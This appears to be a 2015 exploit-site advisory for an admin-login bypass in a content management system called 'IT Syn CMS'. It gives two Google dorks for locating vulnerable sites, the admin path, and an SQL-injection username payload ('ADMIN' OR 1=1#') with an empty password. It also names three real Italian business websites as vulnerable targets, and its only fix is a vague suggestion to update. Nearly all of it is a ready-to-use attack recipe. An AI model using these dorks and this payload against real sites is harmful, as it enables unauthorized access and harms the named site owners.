facebook facebook twitter rss

IT Syn CMS - Admin Bypass

Author: bRpsd , Published: 19-09-2015
{-} Title: IT Syn CMS - Admin Bypass

{+} Date ::
{-} Discovered : 12-06-2015
{-} Published : 24-08-2015

{-} Author: bRpsd (skype: vegnox)

{+} Vendor Homepages::
{-} http://syn-ergo.com/
{-} http://syn-media.com/

{-} Vulnerable Copies : 2008 and prior only.

{x} Google Dorks:: 1 :: Strong
intext:"Questo sito utilizza i cookie. Per maggiori informazioni consulta il link. Cliccando su OK, scorrendo questa pagina o proseguendo la navigazione, si acconsente all’uso dei cookie."


{x} Google Dorks:: 2 :: Weak
inurl:"?module=" site:"it"


-----------------------------------------------------------------------------------------------------------------------------------------------
Admin Page:
/admin/


User: ADMIN' OR 1=1#
Pass: Can be empty.


Test / Vulnerable :
http://www.osteriabaciafemmine.it/admin/
http://www.lfpubblicita.it/admin/
http://www.aurumspoleto.it/admin/
-----------------------------------------------------------------------------------------------------------------------------------------------
S/O T0 Italians Friends =P


## Solutions ## :
Update to the latest version i Guess..

Like us on Facebook :